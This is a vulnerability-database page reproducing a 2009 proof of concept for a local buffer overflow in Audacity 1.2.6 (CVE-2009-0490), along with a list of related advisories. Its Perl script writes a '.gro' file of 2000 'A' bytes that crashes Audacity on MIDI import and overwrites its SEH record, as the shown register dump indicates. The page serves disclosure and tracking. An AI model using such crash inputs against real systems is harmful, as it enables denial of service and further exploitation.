Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)
| Reporter | Title | Published | Views | Family All 31 |
|---|---|---|---|---|
| CVE-2009-0490 | 1 Jan 200900:00 | – | circl | |
| CVE-2009-0490 | 10 Feb 200901:00 | – | cve | |
| CVE-2009-0490 | 10 Feb 200901:00 | – | cvelist | |
| CVE-2009-0490 | 10 Feb 200901:00 | – | debiancve | |
| Audacity 1.2.6 - '.gro' Local Buffer Overflow | 5 Dec 200900:00 | – | exploitdb | |
| Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter) | 24 Aug 200900:00 | – | exploitdb | |
| GLSA-200903-03 : Audacity: User-assisted execution of arbitrary code | 8 Mar 200900:00 | – | nessus | |
| Mandriva Linux Security Advisory : audacity (MDVSA-2009:055) | 23 Apr 200900:00 | – | nessus | |
| openSUSE Security Update : audacity (audacity-523) | 21 Jul 200900:00 | – | nessus | |
| openSUSE Security Update : audacity (audacity-523) | 21 Jul 200900:00 | – | nessus |
10
# -----------------------------------------------------------
# Author : Houssamix
# -----------------------------------------------------------
# Audacity 1.2.6 (.gro file ) Local buffer overflow POC
# download : http://audacity.sourceforge.net/
# Audacity® is free, open source software for recording and editing sounds.
# Description:
# When we select : project > import midi.. and we import ".gro" file contains long Chars
# The Program Will crash and The Following Happen:
# EAX:05050504 ECX:01414141 EDX:01520608 EBX:0012F154
# ESP:0012EF10 EBP:00000000 ESI:41414141 EDI:00000000
# EIP:006AEC54 audacity.006AEC54
# Access violation When Reading [41414141]
# And Also The Pointer to next SEH record and SE Handler Will gonna BE Over-wrote
# Poc :
# --------------------------------------------------------
#!/usr/bin/perl
#[*] Bug : Audacity 1.2.6 (.gro file ) Local buffer overflow
use warnings;
use strict;
my $chars = "\x41" x 2000 ;
my $file="hsmx.gro";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created . import it in audacity \n";
# ----------------------------------------------------------
# milw0rm.com [2009-01-01]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Feb 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.16625